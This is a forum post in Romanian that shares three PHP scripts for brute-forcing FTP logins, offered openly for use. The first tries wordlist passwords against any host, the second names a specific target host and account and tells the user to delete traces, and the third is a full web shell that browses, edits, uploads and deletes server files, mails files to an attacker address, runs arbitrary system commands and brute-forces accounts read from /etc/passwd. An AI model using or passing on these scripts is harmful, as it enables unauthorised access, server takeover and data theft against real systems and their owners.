Jump to content
sawyer

FTP Brute Force ( 3 php scripts )

By sawyer, in Programare

Recommended Posts

sawyer Newbie

sawyer

Posted
Posted

In aceasta sectiune, voi posta 3 coduri de scripturi pe care le puteti folosi pentru brute force

Script 1: ( incepatori )

<?php
error_reporting(0);
$host = $_POST["host"];
$user = $_POST["user"];
$dict = $_POST["dict"];
if (!isset($_POST['submit'])) 
{
echo "<form method=\"post\" action=\"ftpbrute.php\">"; 
echo "Host: <input type=\"text\" name=\"host\">
"; 
echo "User: <input type=\"text\" name=\"user\">
";
echo "Wordlist: <input type=\"text\" name=\"dict\">
";
echo "<input type=\"submit\" value=\"Start\" name=\"submit\">";
echo "</form>";
}else{
$file = fopen ($dict, "r");
while (!feof ($file)) {
$pass[$i] = fgets($file, 1024);
$i++;
} fclose($file);
$limit = count($pass);
$width2 = $limit;
echo "[o] Loaded ".$limit." passwords. 
";
echo "[o] Progress: 
";
echo "<IMG SRC=\"end.jpg\" WIDTH=\"".$width2."\" HEIGHT=\"10\" \">
";
for ($i=0; $i<$limit; $i++){
$ftp = ftp_connect($host, 21);
if(ftp_login($ftp, $user, $pass[$i])){
echo "
[o] Success!
[o] Username: ".$user."
[o] Password:".$pass[$i]."
";
}else{
$width = 1;
echo "<IMG SRC=\"progress.jpg\" WIDTH=\"".$width."\" HEIGHT=\"10\" \">";
}}
ftp_close($ftp);
echo "
Done.";
}
?>

Script 2: ( avansati )

<?php

error_reporting(E_PARSE); //we want any exception except from WARNING MESSAGES
set_time_limit(0); // set the time limit for the script to +oo

$passwordfile = "passwd.dic";   //this is the path to the passwordfile
$targethost = "www.bahoosh.net"; //change this to the host you want to attack
$usrname = "bahoosh"; // change this to the username
                                              // of the FTP account you want
                                              // to attack
$interval = 1; // this is the break the script each time it tries a password
               // do not set this to zero

//change the second arguments you desire
$crh = "Sorry, the host you specified cannot be retrieved!";
$cc = "<font color=\"red\">Sorry, I cannot connect to $targethost with [b]$username[/b] and password: $trypassword</font>
";


/* DO NOT CHAGE ANYTHING BELOW THIS LINE UNLESS YOU REALLY KNOW WHAT YOU ARE DOING */

if(!file_exists($passwordfile)) {
	die("Sorry, the passwordfile [b]$passwordfile[/b] cannot be retrieved");
} else {
	// open connection funtion
        function openconnection($targethost,$username,$trypassword) {
			print "<hr>Trying password [b]$trypassword[/b] for [b]".$username."[/b] to $targethost<hr>
";
			$ftp_conn = @ftp_connect($targethost) or print $crh;
			if($ftp_conn) {
				$trylogin = @ftp_login($ftp_conn,$username,$trypassword);
					if(!$trylogin) {
						print $cc;
					} else {
						print "[b]<font color=\"red\">The password is: $trypassword</font>[/b]
";
						@ftp_quit($ftp_conn);
						break;
					}
			}
		}
        //end of function

        // try to open the password file
	$fp = @fopen($passwordfile,"r");
	if(!$fp) {
		die("The password file cannot open");
	} else {
		print "[b]The passwordfile is forked![/b]";
		//get the passwords
		while($trypassword = @fgets($fp,1024)) {
			openconnection($targethost,$usrname,$trypassword);
			sleep($interval);
		}
	}
	//...and close the password file or die of errors
	@fclose($fp) or die("\n
\nCannot close the password file!\n");
	echo "[b]The password file has closed";

}

// when you succeed connecting to your victim's server
// do not forget to delete your traces
?>

Script 3: ( experti )

<?


/* Your eMail for file sending, type your own*/
$demail ="Type your eMail here";

/* config processing */
$title="FTP Brute Force Edited By:Khodavand_Bozorg (NetGaurd Security Corp)";
$ver="1.1";


/* FTP-Brute */
$filename="/etc/passwd";
$ftp_server="localhost";

/* Options done, now designing */
$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
$style=<<<style
<style>
a.menu   {
color: #ffffcc;
text-decoration:none;
font-family: Times New Roman;
font-weight: bold;
     }
a.menu:hover   {
color: #FF0000;
font-family: Times New Roman;
text-decoration: none
font-weight: bold;
          }
a   {
color: #000000;
text-decoration:none;
font-family: Tahoma;
font-size: 11px;
     }
a:hover   {
color: #184984;
font-family: Tahoma;
text-decoration: underline
font-size: 11px;
          }
td.up{
color: #996600;
font-family: Verdana;
font-weight: normal;
font-size: 11px;
}
.pagetitle {
font-family: Arial, Helvetica, sans-serif; 
color: #FFFFFF; 
text-decoration: none; 
font-size: 12px
}
.alert   {
color: #FF0000;
font-family: Tahoma;
font-size: 11px;
          }
.button1 {
font-size:11px;
font-weight:bold;
font-family:Verdana;
background:#184984;
border:1px solid #000000; cursor:hand; color:#ffffcc;
}
.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
b {  font-weight: bold}
table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
</style>
style;

/* Table styles */
$style1=<<<table
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
table;
$style2=<<<table_file
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
table_file;
$style3=<<<table_dir
STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
table_dir;
$style4=<<<table_files
STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
table_files;
$style_button=<<<button
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
button;
$style_open=<<<open
STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
open;
$style_close=<<<close
STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
close;

/* Post form */
$form = "

     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
   <tr>
  <td align=center class=pagetitle colspan=2>[b]Script help for NetGaurd FTP Brute Force[/b]</font>[/b]</td>
  <td colspan=2 align=center class=pagetitle>[b]Contact With Javid:[/b]</td>
  </tr>
    <tr>
      <td width='250' class=pagetitle>[b]Name:[/b]</td>
      <td width='250' class=pagetitle>
        <input type='text' name='name' size='40' class='inputbox'></td>
      </tr>
    <tr>
      <td width='250' class=pagetitle>[b]Email:[/b]</td>
      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
    </tr>

  <tr>
      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
  <tr>
  <td align=right><input type='submit' value='Submit' name='B1' class=button1 $style_button></td>
      <td align=left><input type='reset' value='Reset' name='B2' class=button1 $style_button></td>
      </tr>
</form></table>

";



/* HTML form */
$HTML=<<<html
<html>
<head>
<title>$title $ver</title>
$meta
$style
</head>
<body bgcolor=#006699 leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
<tr><td align=center colspan=9 class=pagetitle>[b]NetGaurd FTP Brute Force [/b]ver.<font color=red>$ver</font></td></tr>
<tr><td align=center colspan=9 class=pagetitle>Hacking Script...</td></tr>
<tr>
<td $style2 align=center width='25%' >[url="http://www.Exilland.persianblog.com"].:Javid Blog [/url]</td>
<td $style2 align=center width='15%'>[url='$PHP_SELF?action=help'].:About US[/url]</td>
<td $style2 align=center width='15%'>[url='$PHP_SELF?action=ftp'].:FTP[/url]</td>
<td $style2 align=center width='15%'>[url='$PHP_SELF'].:Home[/url]</td>

</tr>
</table>
html;


/* Don't change anything here or the script will be not work*/
global $action,$tm,$cm;

function getdir() {
 global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
 $st = getcwd();
 $st = str_replace("\\","/",$st);
 $j = 0;
 $gdir = array();
 $gsub = array();
 print("
");
 for ($i=0;$i<=(strlen($st)-1);$i++) {
  if ($st[$i] != "/") {
   $gdir[$j] = $gdir[$j].$st[$i];
   $gsub[$j] = $gsub[$j].$st[$i];
  } else {
   $gdir[$j] = $gdir[$j]."/";
   $gsub[$j] = $gsub[$j]."/";
   $gdir[$j+1] = $gdir[$j];
   $j++;
  }
 }
 print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left>[b]Current Directory: [/b]");
 for ($i = 0;$i<=$j;$i++) print("[url='$PHP_SELF?tm=$gdir[$i]']$gsub[$i][/url]");
 $free = tinhbyte(diskfreespace("./"));
 print("</td></tr><tr><td align=left>[b]Avaible Space on Server[/b] : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
 print("<tr><td align=left>[b] ".exec("uname -a")."[/b]</td></tr>");
 print("<tr><td align=left>[b]Your IP:[/b]<font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR</font></td></tr></table>
");
}

function tinhbyte($filesize) {
 if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
 elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
 elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
 else { $filesize = $filesize . ""; }
 return $filesize;
}

function permissions($mode) {
 $perms  = ($mode & 00400) ? "r" : "-";
 $perms .= ($mode & 00200) ? "w" : "-";
 $perms .= ($mode & 00100) ? "x" : "-";
 $perms .= ($mode & 00040) ? "r" : "-";
 $perms .= ($mode & 00020) ? "w" : "-";
 $perms .= ($mode & 00010) ? "x" : "-";
 $perms .= ($mode & 00004) ? "r" : "-";
 $perms .= ($mode & 00002) ? "w" : "-";
 $perms .= ($mode & 00001) ? "x" : "-";
 return $perms;
}

function readdirdata($dir) {
 global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
 $files = array();
 $dirs= array();
 $open = @opendir($dir);

 if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>[b]No Access.[/b]</td></tr></table>";
 else {
  $open = opendir($dir);
  while ($file = readdir($open)) {
   $rec = $file;
   $file = $dir."/".$file;
   if (is_file($file)) $files[] = $rec;
  }
  sort($files);
  $open = opendir($dir);
  $i=0;
  while ($dire = readdir($open)) {
   if ( $dire != "." ) {
    $rec = $dire;
    $dire = $dir."/".$dire;
    if (is_dir($dire)) {
     $dirs[] = $rec;
     $i++;
    }
   }
  }
  sort($dirs);
  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle>[b]Name[/b]</td><td width = '10%' align = 'center' class=pagetitle>[b]Size[/b]</td><td width = '20%' align = 'center' class=pagetitle>[b]Creation Date[/b]</td><td width = '10%' align = 'center' class=pagetitle>[b]Typ[/b]</td><td width = '15%' align = 'center' class=pagetitle>[b]Access Rules[/b]</td><td width = '25%' align = 'center' class=pagetitle>[b]Comments[/b]</td></tr></table>");
  for ($i=0;$i<sizeof($dirs);$i++) {
   if ($dirs[$i] != "..") {
    $type = 'Dir';
    $fullpath = $dir."/".$dirs[$i];
    $time = date("d/m/y H:i",filemtime($fullpath));
    $perm = permissions(fileperms($fullpath));
    $size = tinhbyte(filesize($fullpath));
    $name = $dirs[$i];
    $fullpath = $tm."/".$dirs[$i];
    if ($perm[7] == "w" && $name != "..") $action = "
	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
	<tr>
	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Remove</a></td>
	</tr>
	<tr>
	<td align=center $style3 colspan=2><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>New Directory</a></td>
	</tr></table>";
    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>[b]Read Only[/b]</td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Archiv</a></td></tr></table>";
    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'>[b][i]$name[/i][/b]</a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
   }
  }
  for ($i=0;$i<sizeof($files);$i++) {
   $type = 'File';
   $fullpath =  $dir."/".$files[$i];
   $time = date("d/m/y H:i",filemtime($fullpath));
   $perm = permissions(fileperms($fullpath));
   $size = tinhbyte(filesize($fullpath));
   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view']View[/url]</td><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download']Download[/url]</td>
   <td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail']Download Mail[/url]</td></tr></table>";
   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit']Edit[/url]</td><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete']Delete[/url]</td></tr></table>";
   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'>[b]$files[$i][/b]</font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
  }
 }
}

function html() {
global $ver,$meta,$style;
echo "
<html>
<head>
<title>NetGaurd FTP Brute Force</title>
</head>
<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
";
}

# View File
function viewfile($dir,$file) {

 $buf = explode(".", $file);
 $ext = $buf[sizeof($buf)-1];
 $ext = strtolower($ext);
 $dir = str_replace("\\","/",$dir);
 $fullpath = $dir."/".$file;

 switch ($ext) {
  case "jpg":

	header("Content-type: image/jpeg");
    readfile($fullpath);
    break;
    case "jpeg":

    header("Content-type: image/jpeg");
    readfile($fullpath);
    break;
    case "gif":

    header("Content-type: image/gif");
    readfile($fullpath);
    break;

	 case "png":

    header("Content-type: image/png");
    readfile($fullpath);
    break;
    default:

	 case "avi":	
    header("Content-type: video/avi");
    readfile($fullpath);

    break;
    default:

	 case "mpeg":	
    header("Content-type: video/mpeg");
    readfile($fullpath);
    break;
    default:

	 case "mpg":	
    header("Content-type: video/mpg");
    readfile($fullpath);
    break;
    default:

    html();
	chdir($dir);
    getdir();

   echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Way to File:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
   $fp = fopen($fullpath , "r");
   while (!feof($fp)) {
    $char = fgetc($fp);
    $st .= $char;
   }

   $st = str_replace("&", "&", $st);
   $st = str_replace("<", "<", $st);
   $st = str_replace(">", ">", $st);

   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
   echo $tem;
   fclose($fp);
   break;
 }
}

# Send File to Mail
function download_mail($dir,$file) {
 global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
 $buf = explode(".", $file);
 $dir = str_replace("\\","/",$dir);
 $fullpath = $dir."/".$file;
 $size = tinhbyte(filesize($fullpath));
 $fp = fopen($fullpath, "rb");
 while(!feof($fp))

  $attachment .= fread($fp, 4096);
  $attachment = base64_encode($attachment);
  $subject = "NetGaurd FTP Brute Force  ($file)";

  $boundary = uniqid("NextPart_");
  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";

  $info = "---==== Mail from ($demail)====---\n\n";
  $info .= "IP:\t$REMOTE_ADDR\n";
  $info .= "HOST:\t$HTTP_HOST\n";
  $info .= "URL:\t$HTTP_REFERER\n";
  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";

  $send_to = "$demail";             

  $send = mail($send_to, $subject, $info, $headers);

  if($send == 2)  
   echo "

	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
	<tr><td align=center>
	<font color='#FFFFCC' face='Tahoma' size = 2>Thanks!!!File [b]$file[/b] Was sending you to <u>$demail</u>.</font></center></td></tr></table>
";

fclose($fp);
 }



# Edit File
function editfile($dir,$file) {
 global $action,$datar;
 $fullpath = $dir."/".$file;
 chdir($dir);
 getdir();
 echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
 $fp = fopen($fullpath , "r");
 while (!feof($fp)) {
  $char = fgetc($fp);
  $st .= $char;
 }
 $st = str_replace("&", "&", $st);
 $st = str_replace("<", "<", $st);
 $st = str_replace(">", ">", $st);
 $st = str_replace('"', """, $st);
 echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='Submit' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
 $datar = $S1;

}

# Save File
function savefile($dir,$file) {
 global $action,$S1,$tm;
 $fullpath = $dir."/".$file;
 $fp = fopen($fullpath, "w");
 $S1 = stripslashes($S1);
 fwrite($fp,$S1);
 fclose($fp);
 chdir($dir);
 echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File [b]$fullpath[/b] Edited.</font></td></tr></table>";
 getdir();
 readdirdata($tm);
}

# Delete Directory
function deletef($dir)
{
 global $action,$tm,$fi;
 $tm = str_replace("\\\\","/",$tm);
 $link = $tm."/".$fi;
 unlink($link);
 chdir($tm);
 getdir();
 readdirdata($tm);
}

# Upload File
function uploadtem() {
 global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
 echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>[b]Upload File:[/b]</td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload File' class=button1 $style_button></td></tr></form></table>";
}

function upload() {
 global $HTTP_POST_FILES,$tm;
 echo $set;
 copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("CanT Upload File".$HTTP_POST_FILES["userfile"][name]);
 echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File [b]".$HTTP_POST_FILES["userfile"][name]."[/b] sucessfull uploaded.</font></center></td></tr></table>";
 @unlink($userfile);
 chdir($tm);
 getdir();
 readdirdata($tm);
}


# Create New Directory
function newdir($dir) {
 global $tm,$nd;
 print("
<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle>[b]Create Directory:[/b]</td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create' class=button1 $style_button></td></tr></form></table>");
}

function cdir($dir) {
 global $newd,$tm;
 $fullpath = $dir."/".$newd;
 if (file_exists($fullpath)) @rmdir($fullpath);
 if (@mkdir($fullpath,0777)) {
  echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory created.</font></center></td></tr></table>";
 } else {
  echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Failed To Create Directory.</font></center></td></tr></table>";
 }
 chdir($tm);
 getdir();
 readdirdata($tm);
}

# Delete Directory 
function deldir() {
 global $dd,$tm;
 $fullpath = $tm."/".$dd;
 echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory Deleted.</font></center></td></tr></table>";
 rmdir($fullpath);
 chdir($tm);
 getdir();
 readdirdata($tm);
}

# Mail System
function mailsystem() {
 global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
 if (!isset($status)) echo "$form";
 else {
  $email_to ="Javid.Momeni@Gmail.com";
  $subject = "NetGaurd FTP Brute Force ($name)";
  $headers = "From: $email";

  $info = "---==== Mail from ($name)====---\n\n";
  $info .= "Name:\t$name\n";
  $info .= "Email:\t$email\n";
  $info .= "What?:\n\t$pole\n\n";
  $info .= "IP:\t$REMOTE_ADDR\n";
  $info .= "HOST:\t$HTTP_HOST\n";
  $info .= "URL:\t$HTTP_REFERER\n";
  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
  $send_to = "$email_to";             

  $send = mail($send_to, $subject, $info, $headers);
  if($send == 2) echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thanks!!!Your mail was send.</font></center></td></tr></table>
";
 }
}

# Help
function help() {
 global $action,$REMOTE_ADDR,$HTTP_REFERER;
 echo "

<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
<tr><td align=center class=pagetitle>[b]About NetGaurd FTP Brute Force Script[/b]</font>[/b]</td></tr>
<tr><td bgcolor=#FFFFCC>
[b]NetGaurd FTP Brute Force[/b] - Script For All NetGaurd Full Access Members Team</font>


To This Script Was Added This Menu for Version 1.1 :

- FTP bruteforce (Behrooz_Ice)

[b]NetGaurd FTP Brute Force - Script For All NetGaurd Full Access Members Team. Dont Give to Other People.[/b]


[b]Find Us:[/b]

Site Adress: [url]www.Exilland.Persianblog.com[/url]

See Ya!!!
</td></tr></table>
";
}

# FTP-Brute
function ftp() {
 global $action, $ftp_server, $filename, $HTTP_HOST;
 echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP-server: [b]$ftp_server[/b]</td></tr>";

 $fpip = @fopen ($filename, "r");
 if ($fpip) {
  while (!feof ($fpip)) { 
   $buf = fgets($fpip, 100);
   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
   $conn_id=ftp_connect($ftp_server);
   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {

   $f=@fopen($HTTP_HOST,"a+");
   fputs($f,"$g[1]:$g[1]\n");
     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>[b]Connected with login:password - ".$g[1].":".$g[1]."[/b]</td></tr></table>";

   ftp_close($conn_id);
   fclose($f);
   } else {
    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - [b]failed[/b]</td></tr></table>";
   }
  }
 }
}


function ashiyane_copyright() {
global $action,$upass,$uname,$nfm;
 return "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2>[b]Powered by NetGaurd Security Corp (author Khodavand_Bozorg) Special Thanks to Lucifer & Q7x < Made In IRan >[/b]</font></center></td></tr></table></body></html>";


 }

/* main() */
set_time_limit(0);

if ( $action !="download") print("$HTML");

if (!isset($cm)) {
 if (!isset($action)) {
  if (!isset($tm)) { $tm = getcwd(); }
  $curdir = getcwd();
  if (!@chdir($tm)) exit("
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>No Access To The Directory, Look CHMOD.</td></tr></table>");
  getdir();
  chdir($curdir);
  $supsub = $gdir[$j-1];
  if (!isset($tm) ) { $tm=getcwd();}
  readdirdata($tm);
 } else {
  switch ($action) {
   case "view":
    viewfile($tm,$fi);
    break;
   case "delete":
    echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File [b]$fi[/b] Sucessfull Deleted.</font></center></td></tr></table>";
    deletef($tm);
    break;
   case "download":
   if (isset($fatt) && strlen($fatt)>0) {
    $attach=$fatt; 
    header("Content-type: text/plain"); 
   } 
   else {
    $attach=$fi;
    header("Content-type: Haji"); 
   }
   header("Content-disposition: attachment; filename=\"$attach\";"); 
   readfile($tm."/".$fi);
   break;
   case "download_mail":
   download_mail($tm,$fi);
   break;
   case "edit":
   editfile($tm,$fi);
   break;
  case "save":
   savefile($tm,$fi);
   break;
  case "uploadd":
   uploadtem();
   break;
  case "up":
   up($tm);
   break;
  case "newdir":
   newdir($tm);
   break;
  case "createdir":
   cdir($tm);
   break;
  case "deldir":
   deldir();
   break;
  case "upload":
   upload();
   break;
  case "help":
   help();
   break;
  case "ftp":
   ftp();
   break;
   case "passwd":
   passwd();
   break; 
  }
 }
} else {
 echo "
<table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Finished: $cm</center><pre>";
 echo system($cm);
 echo "</pre></td></tr></table>";
}

if ( $action !="download") echo ashiyane_copyright();
?>

succes! sper sa va ajute la ceva :P

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...